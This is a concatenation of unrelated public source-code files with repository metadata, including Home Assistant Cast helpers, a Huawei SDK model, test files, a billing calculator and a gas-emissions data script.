"shrinkwrap": "true",
"fetch_retry_factor": "10",
"npat": "",
"proprietary_attribs": "true",
"save_exact": "",
"strict_ssl": "true",
"globalconfig": "/etc/npmrc",
"dev": "",
"init_module": "/home/node1/.npm-init.js",
"parseable": "",
"globalignorefile": "/etc/npmignore",
"cache_lock_retries": "10",
"save_prefix": "^",
"group": "1000",
"init_author_email": "",
"searchexclude": "",
"git": "git",
"optional": "true",
"json": ""
}
}
|
[
"savitri.sonnad@inetframe.com"
] |
savitri.sonnad@inetframe.com
|
d6c6ef41a93ddf5071425f220a32d513faabedcb
|
d4a5462b2cd2eff99da6ad5147b5423c819ae731
|
/1035.py
|
17ec547190913baa9f8a7082b65a74d1eeb678cf
|
[] |
no_license
|
Rafesz/URI_solutions_py
|
3a61e6b0b571a03857f1c4efb54546edb2a0fb6a
|
62a9f8227523e409afa9d506df66516ef9b48079
|
refs/heads/main
| 2023-08-11T20:55:04.267913
| 2021-09-21T22:25:50
| 2021-09-21T22:25:50
| 402,085,340
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 709
|
py
|
# Leia 4 valores inteiros A, B, C e D. A seguir, se B for maior do que C e se D for maior do que A, e a soma de C com D for maior que a soma de A e B e se C e D, ambos, forem positivos e se a variรกvel A for par escrever a mensagem "Valores aceitos", senรฃo escrever "Valores nao aceitos".
# Entrada
# Quatro nรบmeros inteiros A, B, C e D.
# Saรญda
# Mostre a respectiva mensagem apรณs a validaรงรฃo dos valores.
valores = input()
a = int(valores.split(' ')[0])
b = int(valores.split(' ')[1])
c = int(valores.split(' ')[2])
d = int(valores.split(' ')[3])
if((b>c) and (d>a) and (c+d>a+b) and c>0 and d>0 and a%2==0):
print("Valores aceitos")
else:
print("Valores nao aceitos")
|
[
"noreply@github.com"
] |
noreply@github.com
|
591897413cfedd971e1f5fd6e91cc59b6dcc9383
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/homeassistant/components/cast/helpers.py
|
c6a92c21fb462790c9a937b728dc7784cd8ac5ec
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 12,912
|
py
|
"""Helpers to deal with Cast devices."""
from __future__ import annotations
import asyncio
import configparser
from dataclasses import dataclass
import logging
from typing import TYPE_CHECKING
from urllib.parse import urlparse
import aiohttp
import attr
import pychromecast
from pychromecast import dial
from pychromecast.const import CAST_TYPE_GROUP
from pychromecast.models import CastInfo
from homeassistant.core import HomeAssistant
from homeassistant.helpers import aiohttp_client
from .const import DOMAIN
if TYPE_CHECKING:
from homeassistant.components import zeroconf
_LOGGER = logging.getLogger(__name__)
_PLS_SECTION_PLAYLIST = "playlist"
@attr.s(slots=True, frozen=True)
class ChromecastInfo:
"""Class to hold all data about a chromecast for creating connections.
This also has the same attributes as the mDNS fields by zeroconf.
"""
cast_info: CastInfo = attr.ib()
is_dynamic_group = attr.ib(type=bool | None, default=None)
@property
def friendly_name(self) -> str:
"""Return the Friendly Name."""
return self.cast_info.friendly_name
@property
def is_audio_group(self) -> bool:
"""Return if the cast is an audio group."""
return self.cast_info.cast_type == CAST_TYPE_GROUP
@property
def uuid(self) -> bool:
"""Return the UUID."""
return self.cast_info.uuid
def fill_out_missing_chromecast_info(self, hass: HomeAssistant) -> ChromecastInfo:
"""Return a new ChromecastInfo object with missing attributes filled in.
Uses blocking HTTP / HTTPS.
"""
cast_info = self.cast_info
if self.cast_info.cast_type is None or self.cast_info.manufacturer is None:
unknown_models = hass.data[DOMAIN]["unknown_models"]
if self.cast_info.model_name not in unknown_models:
# Manufacturer and cast type is not available in mDNS data,
# get it over HTTP
cast_info = dial.get_cast_type(
cast_info,
zconf=ChromeCastZeroconf.get_zeroconf(),
)
unknown_models[self.cast_info.model_name] = (
cast_info.cast_type,
cast_info.manufacturer,
)
report_issue = (
"create a bug report at "
"https://github.com/home-assistant/core/issues?q=is%3Aopen+is%3Aissue"
"+label%3A%22integration%3A+cast%22"
)
_LOGGER.info(
(
"Fetched cast details for unknown model '%s' manufacturer:"
" '%s', type: '%s'. Please %s"
),
cast_info.model_name,
cast_info.manufacturer,
cast_info.cast_type,
report_issue,
)
else:
cast_type, manufacturer = unknown_models[self.cast_info.model_name]
cast_info = CastInfo(
cast_info.services,
cast_info.uuid,
cast_info.model_name,
cast_info.friendly_name,
cast_info.host,
cast_info.port,
cast_type,
manufacturer,
)
if not self.is_audio_group or self.is_dynamic_group is not None:
# We have all information, no need to check HTTP API.
return ChromecastInfo(cast_info=cast_info)
# Fill out missing group information via HTTP API.
is_dynamic_group = False
http_group_status = None
http_group_status = dial.get_multizone_status(
None,
services=self.cast_info.services,
zconf=ChromeCastZeroconf.get_zeroconf(),
)
if http_group_status is not None:
is_dynamic_group = any(
g.uuid == self.cast_info.uuid for g in http_group_status.dynamic_groups
)
return ChromecastInfo(
cast_info=cast_info,
is_dynamic_group=is_dynamic_group,
)
class ChromeCastZeroconf:
"""Class to hold a zeroconf instance."""
__zconf: zeroconf.HaZeroconf | None = None
@classmethod
def set_zeroconf(cls, zconf: zeroconf.HaZeroconf) -> None:
"""Set zeroconf."""
cls.__zconf = zconf
@classmethod
def get_zeroconf(cls) -> zeroconf.HaZeroconf | None:
"""Get zeroconf."""
return cls.__zconf
class CastStatusListener(
pychromecast.controllers.media.MediaStatusListener,
pychromecast.controllers.multizone.MultiZoneManagerListener,
pychromecast.controllers.receiver.CastStatusListener,
pychromecast.socket_client.ConnectionStatusListener,
):
"""Helper class to handle pychromecast status callbacks.
Necessary because a CastDevice entity or dynamic group can create a new
socket client and therefore callbacks from multiple chromecast connections can
potentially arrive. This class allows invalidating past chromecast objects.
"""
def __init__(self, cast_device, chromecast, mz_mgr, mz_only=False):
"""Initialize the status listener."""
self._cast_device = cast_device
self._uuid = chromecast.uuid
self._valid = True
self._mz_mgr = mz_mgr
if cast_device._cast_info.is_audio_group:
self._mz_mgr.add_multizone(chromecast)
if mz_only:
return
chromecast.register_status_listener(self)
chromecast.socket_client.media_controller.register_status_listener(self)
chromecast.register_connection_listener(self)
if not cast_device._cast_info.is_audio_group:
self._mz_mgr.register_listener(chromecast.uuid, self)
def new_cast_status(self, status):
"""Handle reception of a new CastStatus."""
if self._valid:
self._cast_device.new_cast_status(status)
def new_media_status(self, status):
"""Handle reception of a new MediaStatus."""
if self._valid:
self._cast_device.new_media_status(status)
def load_media_failed(self, item, error_code):
"""Handle reception of a new MediaStatus."""
if self._valid:
self._cast_device.load_media_failed(item, error_code)
def new_connection_status(self, status):
"""Handle reception of a new ConnectionStatus."""
if self._valid:
self._cast_device.new_connection_status(status)
def added_to_multizone(self, group_uuid):
"""Handle the cast added to a group."""
def removed_from_multizone(self, group_uuid):
"""Handle the cast removed from a group."""
if self._valid:
self._cast_device.multizone_new_media_status(group_uuid, None)
def multizone_new_cast_status(self, group_uuid, cast_status):
"""Handle reception of a new CastStatus for a group."""
def multizone_new_media_status(self, group_uuid, media_status):
"""Handle reception of a new MediaStatus for a group."""
if self._valid:
self._cast_device.multizone_new_media_status(group_uuid, media_status)
def invalidate(self):
"""Invalidate this status listener.
All following callbacks won't be forwarded.
"""
# pylint: disable=protected-access
if self._cast_device._cast_info.is_audio_group:
self._mz_mgr.remove_multizone(self._uuid)
else:
self._mz_mgr.deregister_listener(self._uuid, self)
self._valid = False
class PlaylistError(Exception):
"""Exception wrapper for pls and m3u helpers."""
class PlaylistSupported(PlaylistError):
"""The playlist is supported by cast devices and should not be parsed."""
@dataclass
class PlaylistItem:
"""Playlist item."""
length: str | None
title: str | None
url: str
def _is_url(url):
"""Validate the URL can be parsed and at least has scheme + netloc."""
result = urlparse(url)
return all([result.scheme, result.netloc])
async def _fetch_playlist(hass, url, supported_content_types):
"""Fetch a playlist from the given url."""
try:
session = aiohttp_client.async_get_clientsession(hass, verify_ssl=False)
async with session.get(url, timeout=5) as resp:
charset = resp.charset or "utf-8"
if resp.content_type in supported_content_types:
raise PlaylistSupported
try:
playlist_data = (await resp.content.read(64 * 1024)).decode(charset)
except ValueError as err:
raise PlaylistError(f"Could not decode playlist {url}") from err
except asyncio.TimeoutError as err:
raise PlaylistError(f"Timeout while fetching playlist {url}") from err
except aiohttp.client_exceptions.ClientError as err:
raise PlaylistError(f"Error while fetching playlist {url}") from err
return playlist_data
async def parse_m3u(hass, url):
"""Very simple m3u parser.
Based on https://github.com/dvndrsn/M3uParser/blob/master/m3uparser.py
"""
# From Mozilla gecko source: https://github.com/mozilla/gecko-dev/blob/c4c1adbae87bf2d128c39832d72498550ee1b4b8/dom/media/DecoderTraits.cpp#L47-L52
hls_content_types = (
# https://tools.ietf.org/html/draft-pantos-http-live-streaming-19#section-10
"application/vnd.apple.mpegurl",
# Additional informal types used by Mozilla gecko not included as they
# don't reliably indicate HLS streams
)
m3u_data = await _fetch_playlist(hass, url, hls_content_types)
m3u_lines = m3u_data.splitlines()
playlist = []
length = None
title = None
for line in m3u_lines:
line = line.strip()
if line.startswith("#EXTINF:"):
# Get length and title from #EXTINF line
info = line.split("#EXTINF:")[1].split(",", 1)
if len(info) != 2:
_LOGGER.warning("Ignoring invalid extinf %s in playlist %s", line, url)
continue
length = info[0].split(" ", 1)
title = info[1].strip()
elif line.startswith("#EXT-X-VERSION:"):
# HLS stream, supported by cast devices
raise PlaylistSupported("HLS")
elif line.startswith("#EXT-X-STREAM-INF:"):
# HLS stream, supported by cast devices
raise PlaylistSupported("HLS")
elif line.startswith("#"):
# Ignore other extensions
continue
elif len(line) != 0:
# Get song path from all other, non-blank lines
if not _is_url(line):
raise PlaylistError(f"Invalid item {line} in playlist {url}")
playlist.append(PlaylistItem(length=length, title=title, url=line))
# reset the song variables so it doesn't use the same EXTINF more than once
length = None
title = None
return playlist
async def parse_pls(hass, url):
"""Very simple pls parser.
Based on https://github.com/mariob/plsparser/blob/master/src/plsparser.py
"""
pls_data = await _fetch_playlist(hass, url, ())
pls_parser = configparser.ConfigParser()
try:
pls_parser.read_string(pls_data, url)
except configparser.Error as err:
raise PlaylistError(f"Can't parse playlist {url}") from err
if (
_PLS_SECTION_PLAYLIST not in pls_parser
or pls_parser[_PLS_SECTION_PLAYLIST].getint("Version") != 2
):
raise PlaylistError(f"Invalid playlist {url}")
try:
num_entries = pls_parser.getint(_PLS_SECTION_PLAYLIST, "NumberOfEntries")
except (configparser.NoOptionError, ValueError) as err:
raise PlaylistError(f"Invalid NumberOfEntries in playlist {url}") from err
playlist_section = pls_parser[_PLS_SECTION_PLAYLIST]
playlist = []
for entry in range(1, num_entries + 1):
file_option = f"File{entry}"
if file_option not in playlist_section:
_LOGGER.warning("Missing %s in pls from %s", file_option, url)
continue
item_url = playlist_section[file_option]
if not _is_url(item_url):
raise PlaylistError(f"Invalid item {item_url} in playlist {url}")
playlist.append(
PlaylistItem(
length=playlist_section.get(f"Length{entry}"),
title=playlist_section.get(f"Title{entry}"),
url=item_url,
)
)
return playlist
async def parse_playlist(hass, url):
"""Parse an m3u or pls playlist."""
if url.endswith(".m3u") or url.endswith(".m3u8"):
playlist = await parse_m3u(hass, url)
else:
playlist = await parse_pls(hass, url)
if not playlist:
raise PlaylistError(f"Empty playlist {url}")
return playlist
|
[
"noreply@github.com"
] |
noreply@github.com
|
8461e2f548998a35f94100eb6fdd0f429b1d5ab8
|
c68268657c1a94c09271a124b200b0aeb85bb05e
|
/angulardjangorest/angular/views.py
|
2fc517fe4100318c5e1a5d13e2a29905c476cc33
|
[] |
no_license
|
photonkhan/angulardjangorest
|
146960801c8fdab924c4012271075a04c1379d91
|
3357066ab094ae152b138a506f3e2d41588ecf68
|
refs/heads/master
| 2022-12-12T02:09:56.248353
| 2018-07-25T13:12:39
| 2018-07-25T13:12:39
| 142,123,874
| 0
| 0
| null | 2022-11-17T05:58:28
| 2018-07-24T07:49:54
|
HTML
|
UTF-8
|
Python
| false
| false
| 278
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
# Create your views here.
def index(request):
context = {
'header' : 'Angular with Djano Rest API'
}
return render(request, 'angular/index.html', context)
|
[
"you@example.com"
] |
you@example.com
|
aed096f0fa853f4bd7cb572ae62823a68425cc61
|
0a980a0ee82e702fb49082b94013cd69674b6260
|
/resume-codewars/fav_lang.py
|
6492d1d3668f1ff2db9fe09f64031e784163456a
|
[] |
no_license
|
avtokit2700/resume
|
3578ee06ccce826e5b13dd1d1e982f720dc45dc4
|
237f3373b2e8fff141f7f0f69c6492f414156654
|
refs/heads/master
| 2021-01-17T17:26:26.833357
| 2017-08-05T22:36:10
| 2017-08-05T22:36:10
| 82,938,342
| 0
| 0
| null | 2017-03-25T21:32:44
| 2017-02-23T15:01:20
|
Python
|
UTF-8
|
Python
| false
| false
| 301
|
py
|
fav_lang = {
'jen': 'python',
'sarah': 'c',
'edward': 'ruby',
'phil': 'python',
}
must = ['jen', 'vlad']
for m in must:
if m in fav_lang.keys():
print("{}, thanks for your voice".format(m.title()))
else:
print("Hey " + m.title() + ' you must voted!')
|
[
"noreply@github.com"
] |
noreply@github.com
|
d29f521a654b15c312751d8f72d1ec6c1fa0ff3d
|
d0081f81996635e913b1f267a4586eb0bfd3dcd5
|
/tests/unit/dataactvalidator/test_fabsreq4.py
|
489d9acbfbffa7cd67a5f92be51975de4852decc
|
[
"CC0-1.0"
] |
permissive
|
fedspendingtransparency/data-act-broker-backend
|
71c10a6c7c284c8fa6556ccc0efce798870b059b
|
b12c73976fd7eb5728eda90e56e053759c733c35
|
refs/heads/master
| 2023-09-01T07:41:35.449877
| 2023-08-29T20:14:45
| 2023-08-29T20:14:45
| 57,313,310
| 55
| 36
|
CC0-1.0
| 2023-09-13T16:40:58
| 2016-04-28T15:39:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,561
|
py
|
from tests.unit.dataactcore.factories.staging import FABSFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'fabsreq4'
def test_column_headers(database):
expected_subset = {'row_number', 'business_funds_indicator', 'correction_delete_indicatr',
'uniqueid_AssistanceTransactionUniqueKey'}
actual = set(query_columns(_FILE, database))
assert expected_subset == actual
def test_success(database):
""" Test BusinessFundsIndicator is required for all submissions except delete records. """
fabs = FABSFactory(correction_delete_indicatr='C', business_funds_indicator='REC')
fabs_2 = FABSFactory(correction_delete_indicatr='', business_funds_indicator='NON')
# Test ignoring for D records
fabs_3 = FABSFactory(correction_delete_indicatr='d', business_funds_indicator=None)
fabs_4 = FABSFactory(correction_delete_indicatr='D', business_funds_indicator='')
fabs_5 = FABSFactory(correction_delete_indicatr='D', business_funds_indicator='RE')
errors = number_of_errors(_FILE, database, models=[fabs, fabs_2, fabs_3, fabs_4, fabs_5])
assert errors == 0
def test_failure(database):
""" Test fail BusinessFundsIndicator is required for all submissions except delete records. """
fabs = FABSFactory(correction_delete_indicatr='c', business_funds_indicator=None)
fabs_2 = FABSFactory(correction_delete_indicatr=None, business_funds_indicator='')
errors = number_of_errors(_FILE, database, models=[fabs, fabs_2])
assert errors == 2
|
[
"Burdeyny_Alisa@bah.com"
] |
Burdeyny_Alisa@bah.com
|
ff6750998ace4ef5d00078ea55ba213c8bdec0e3
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-bcs/huaweicloudsdkbcs/v2/model/dimension.py
|
cd981259ff98407818c27a6f0bc3680ff3fc3da4
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,440
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class Dimension:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'name': 'str',
'value': 'str'
}
attribute_map = {
'name': 'name',
'value': 'value'
}
def __init__(self, name=None, value=None):
"""Dimension - a model defined in huaweicloud sdk"""
self._name = None
self._value = None
self.discriminator = None
if name is not None:
self.name = name
if value is not None:
self.value = value
@property
def name(self):
"""Gets the name of this Dimension.
็ปดๅบฆๅ็งฐใ
:return: The name of this Dimension.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Dimension.
็ปดๅบฆๅ็งฐใ
:param name: The name of this Dimension.
:type: str
"""
self._name = name
@property
def value(self):
"""Gets the value of this Dimension.
็ปดๅบฆๅๅผใ
:return: The value of this Dimension.
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this Dimension.
็ปดๅบฆๅๅผใ
:param value: The value of this Dimension.
:type: str
"""
self._value = value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Dimension):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
84c1e7300fa229fc4c6af81029f8c681e97cf881
|
182fce54fdaa79a05a6771dc537305f348650913
|
/src/billing_calculator.py
|
0070b60e6bd192dca0c9a2570e61388052c9b55e
|
[] |
no_license
|
energy-army-knife/hack-the-electron-a
|
aa69f85ef666a711714132ce589d0dc0716e9d9a
|
cbd487608383f2ec619a933a7d628725cd604aff
|
refs/heads/master
| 2023-03-13T20:55:49.089851
| 2021-03-24T13:35:39
| 2021-03-24T13:35:39
| 351,020,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,734
|
py
|
import pandas as pd
from electron_django import settings
from src.data_loader import TariffPeriods, TariffDataLoader, PowerDataLoader, MetersInformation
from src.data_models import TariffCost, TariffType, HourTariffType
from src.exceptions import TariffHoursException
from src.time_peak_type_calculator import TimePeakTypesCalculator
class Bill:
def __init__(self, costs_per_day: float, times_peaks_distribution: dict, costs_peaks_distribution: dict):
self.costs_per_day = costs_per_day
self.times_peaks_distribution = times_peaks_distribution
self.costs_peaks_distribution = costs_peaks_distribution
def get_total(self) -> float:
return sum(self.costs_peaks_distribution.values()) + self.costs_per_day
def get_cost_without_days_cut(self):
return sum(self.costs_peaks_distribution.values())
class BillingCalculator:
def __init__(self, tariff_data_loader: TariffDataLoader, tariff_periods: TariffPeriods = None):
self.tariff_data_loader = tariff_data_loader
self.tariff_periods = tariff_periods
self.time_peaks_calculator = TimePeakTypesCalculator()
def compute_total_cost(self, power_data, contracted_power: float, tariff: TariffType) -> Bill:
contract_costs = self.tariff_data_loader.get_tariff_by_contracted_tariff_type(contracted_power, tariff)
cost_per_days = self.compute_cost_per_days(power_data, contract_costs)
periods_peaks = self.tariff_periods.get_periods_for_tariff(tariff)
take_into_account_season = tariff == TariffType.THREE_PERIOD
times_peaks_distribution = self.time_peaks_calculator.get_power_spent(power_data, periods_peaks,
take_into_account_season)
costs_peaks_distribution = self.tariff_hours_compute(times_peaks_distribution, contract_costs)
return Bill(cost_per_days, times_peaks_distribution, costs_peaks_distribution)
@staticmethod
def compute_cost_per_days(power_data: pd.DataFrame, tariff_cost: TariffCost):
return ((power_data.index[-1] - power_data.index[0]).days + 1) * tariff_cost.power_cost_per_day
@staticmethod
def tariff_hours_compute(times_peaks_distribution: dict, tariff_costs: TariffCost) -> dict:
times_peaks_costs = times_peaks_distribution.copy()
for peak_name, power_spent in times_peaks_costs.items():
if peak_name == HourTariffType.PEAK:
times_peaks_costs[peak_name] = power_spent * tariff_costs.peak_periods_cost
elif peak_name == HourTariffType.OFF_PEAK:
times_peaks_costs[peak_name] = power_spent * tariff_costs.off_peak_periods
elif peak_name == HourTariffType.SUPER_OFF_PEAK:
times_peaks_costs[peak_name] = power_spent * tariff_costs.super_peak_cost
else:
raise TariffHoursException(
"The tariff slot type {0} does to exist".format(peak_name))
return times_peaks_costs
if __name__ == '__main__':
power_loader = PowerDataLoader(settings.RESOURCES + "/load_pwr.csv")
tarriff_periods = TariffPeriods(settings.RESOURCES + "/HackTheElectron dataset support data/"
"Tariff-Periods-Table 1.csv")
tariff_data_load = TariffDataLoader(settings.RESOURCES + "/HackTheElectron dataset support data/"
"Regulated Tarrifs-Table 1.csv")
meter_info = MetersInformation(settings.RESOURCES + "/dataset_index.csv")
meter_analyse = "meter_5"
info_meter_0 = power_loader.get_power_meter_id(meter_analyse)
meter_contract = meter_info.get_meter_id_contract_info(meter_analyse)
meter_power_0 = power_loader.get_power_meter_id(meter_analyse)[0:1]
billing_calculator = BillingCalculator(tariff_data_load, tarriff_periods)
total_cost_simple = billing_calculator.compute_total_cost(meter_power_0, meter_contract.contracted_power,
TariffType.SIMPLE)
total_two_cost = billing_calculator.compute_total_cost(meter_power_0, meter_contract.contracted_power,
TariffType.TWO_PERIOD)
total_three_period = billing_calculator.compute_total_cost(meter_power_0, meter_contract.contracted_power,
TariffType.THREE_PERIOD)
print("Simple Tariff")
print("Payed: {0}".format(total_cost_simple.get_total()))
print("Two Tariff")
print("Payed: {0}".format(total_two_cost.get_total()))
print("Three Period Tariff")
print("Payed: {0}".format(total_three_period.get_total()))
|
[
"mfatimamachado13@gmail.com"
] |
mfatimamachado13@gmail.com
|
ba4cb1ebbd0bd1a3353a936b7ffabee94f7f78a6
|
9ccc18775bb6e33873c6f53ee4416ce372935769
|
/python_script/script/script.py
|
d85e37370582a21b9c418f6cde15ede6395588af
|
[] |
no_license
|
raghavverma190/GreenhouseGasEmissions
|
fb5c75c974437d747ef6883f1bb7564dab78b5e5
|
1f87e0a843223f114d8ab57003910428caadf0c0
|
refs/heads/main
| 2023-07-17T06:13:50.439618
| 2021-08-13T04:50:31
| 2021-08-13T04:50:31
| 395,290,725
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,195
|
py
|
import json
import csv
from collections import defaultdict
import pandas
import pandas as pd
import numpy as np
class GasEmissions:
def __init__(self,FILE_INPUT_CALL):
"""
File input file name is initialised
:param FILE_INPUT_CALL:
"""
self.FILE_INPUT= FILE_INPUT_CALL
def def_value(self):
"""
Returns the default value as list of key not present in dictionary
:return:List
"""
return []
def cleanData(self):
"""
Checking for null values in dataset.
As there are no null values; long category names are reduced to short names, and generated in a new cleaned CSV file
:return:None
"""
# Override default pandas configuration
pd.options.display.width = 0
pd.options.display.max_rows = 10000
pd.options.display.max_info_columns = 10000
# Opening dataset
df = pd.read_csv(self.FILE_INPUT)
# Rename columns
df.rename(columns={'country_or_area': 'country'}, inplace=True)
#Checking for nulls in dataset
number_of_nulls = df.isnull().sum().sum()
print(f"Null values in dataset: {number_of_nulls}")
#Renaming categories
category = df['category']
df['category'] = np.where(
category != "carbon_dioxide_co2_emissions_without_land_use_land_use_change_and_forestry_lulucf_in_kilotonne_co2_equivalent",
category, 'CO2')
df['category'] = np.where(
category != "greenhouse_gas_ghgs_emissions_including_indirect_co2_without_lulucf_in_kilotonne_co2_equivalent",
category, 'GHG_indirect_CO2')
df['category'] = np.where(
category != "greenhouse_gas_ghgs_emissions_without_land_use_land_use_change_and_forestry_lulucf_in_kilotonne_co2_equivalent",
category, 'GHG')
df['category'] = np.where(
category != "hydrofluorocarbons_hfcs_emissions_in_kilotonne_co2_equivalent",
category, 'HFC')
df['category'] = np.where(
category != "methane_ch4_emissions_without_land_use_land_use_change_and_forestry_lulucf_in_kilotonne_co2_equivalent",
category, 'CH4')
df['category'] = np.where(
category != "nitrous_oxide_n2o_emissions_without_land_use_land_use_change_and_forestry_lulucf_in_kilotonne_co2_equivalent",
category, 'N2Os')
df['category'] = np.where(
category != "perfluorocarbons_pfcs_emissions_in_kilotonne_co2_equivalent",
category, 'PFCs')
df['category'] = np.where(
category != "sulphur_hexafluoride_sf6_emissions_in_kilotonne_co2_equivalent",
category, 'SF6')
df['category'] = np.where(
category != "unspecified_mix_of_hydrofluorocarbons_hfcs_and_perfluorocarbons_pfcs_emissions_in_kilotonne_co2_equivalent",
category, 'HFC_PFC_mix')
df['category'] = np.where(
category != "nitrogen_trifluoride_nf3_emissions_in_kilotonne_co2_equivalent",
category, 'HF3')
# writing into the file
df.to_csv(f"cleaned_{self.FILE_INPUT}", index=False)
print("Data has been cleaned")
def readDataFromCSV(self):
"""
Data is read from cleaned CSV file. Aim is to convert data in JSON format that can be read for generating graphs in frontend.
Data is first separated in terms of category(parameters such as CO2,CH4,HFC etc). Then data for each parameter is separated based
on year; achieving the required format mentioned below.
Format of json data required:
[{country:value,year:XXXX}....from 1990-2014]
After format for a paramter is achieved, dictionary is iterated and sent to the function(writeJSONFile) that generates JSON data
for that particular parameter
:return: None
"""
#Main dictionary maintained for all parameters
data_dict = defaultdict(self.def_value)
#Dictionary maintained to keep track of EACH year for EACH parameter
year_dict = {}
with open(f"cleaned_{self.FILE_INPUT}", mode="r") as csv_read:
file_reader = csv.reader(csv_read, delimiter=",")
for field in file_reader:
if field[0] != "country":
if field[3] not in year_dict:
year_dict[field[3]] = {}
if field[1] not in year_dict[field[3]]:
year_dict[field[3]][field[1]] = {'year': int(field[1])}
year_dict[field[3]][field[1]][field[0]] = int(float(field[2]))
for key, value in year_dict.items():
for key2, value2 in year_dict[key].items():
data_dict[key].append(value2)
for key, value in data_dict.items():
self.writeJSONFile(data_list=value, FILE_OUTPUT=key)
def writeJSONFile(self,data_list, FILE_OUTPUT):
"""
Data for each parameter receieved from readDataFromCSV function is converted to JSON format
All json data is stored in data directory inside the src folder of frontend
:param data_list:
:param FILE_OUTPUT:
:return: None
"""
#Writing into json file
with open(f"json_data/{FILE_OUTPUT}", "wt") as json_write:
for result in data_list:
if result == data_list[0]:
json_write.write("[")
json.dump(result, json_write, sort_keys=True, indent=4, ensure_ascii=False)
if result == data_list[-1]:
json_write.write("]")
if result != data_list[-1]:
json_write.write(",")
print(f"JSON data for {FILE_OUTPUT} has been generated")
def mapVisualization(self):
"""
Cleaned CSV data file is read using pandas. Each row is iterated and added to a dictionary(based on parameter) to acheive format shown
below. After dictionary is created(for each parameter), a new CSV file in MapVisualizationData folder is created and
data is added from the dictionary. All MapVisualizationCSV files are added in the public directory inside frontend folder.
Current Fromat:
country year value category
Australia 2014 393126.947 CO2
AIM(separate file for each category with the following format):
ISO3 Name 1995 1996 1997 1998 1999 2000 2001
AFG Afghanistan 0.449547099 0.449547099 0.449547099 0.449324036 0.449100972 0.448877909 0.448654846
:return: None
"""
# Override default pandas configuration
pd.options.display.width = 0
pd.options.display.max_rows = 10000
pd.options.display.max_info_columns = 10000
#Reading cleaned csv file
df = pd.read_csv(f'cleaned_{self.FILE_INPUT}')
parameters = ['CH4', 'CO2', 'GHG', 'GHG_indirect_CO2', 'HF3', 'HFC', 'HFC_PFC_mix', 'N2Os', 'PFCs', 'SF6']
#Iterating through all parameters and generating MapVisualization csv file for each parameter
for parameter in parameters:
dff = df[df['category'] == parameter]
dff = dff.drop(columns=['category'])
country_dict = {}
rows = []
for row in dff.itertuples():
if row[1] not in country_dict:
country_dict[row[1]] = {}
country_dict[row[1]][row[2]] = row[3]
for key, value in country_dict.items():
value['Name'] = key
rows.append(value)
dff = pd.DataFrame(rows)
#Merging wikipedia country codes file with our dataframe to include ISO3 format country values that will be read
#in frontend for map visualization
cc = pd.read_csv('wikipedia-iso-country-codes.csv')
cc = cc.rename(columns={"Alpha-3 code": "ISO3"})
dff_merge = pd.merge(dff, cc, left_on='Name', right_on='English short name lower case', how='left')
dff_merge = dff_merge.drop(
columns=['English short name lower case', 'Alpha-2 code', 'Numeric code', 'ISO 3166-2'])
dff_merge.to_csv(f'MapVisualizationData/{parameter}_MV.csv', index=False)
print(f"{parameter} map visualization file created")
def MinMaxValues(self):
"""
Function required to know min-max values for each gas in the year of 2014. This data will be used in the front end
for domain in map visualization
:return: None
"""
# Override default pandas configuration
pd.options.display.width = 0
pd.options.display.max_rows = 10000
pd.options.display.max_info_columns = 10000
parameters = ['CH4', 'CO2', 'GHG', 'GHG_indirect_CO2', 'HF3', 'HFC', 'HFC_PFC_mix', 'N2Os', 'PFCs', 'SF6']
for parameter in parameters:
df = pd.read_csv(f'MapVisualizationData/{parameter}_MV.csv')
print(f"{parameter} : ")
tup=(df['2014'].min(),df['2014'].max())
print(tup)
|
[
"raghav.verma190@gmail.com"
] |
raghav.verma190@gmail.com
|
a86d41080f7599c1ab7e74fb8152208371ace868
|
e98b2b1259ff946612ea804ee3512821416b5c90
|
/src/flask/app/graph/channel/data.py
|
7557b608801e6b2f419e18768dbe958528645b7f
|
[] |
no_license
|
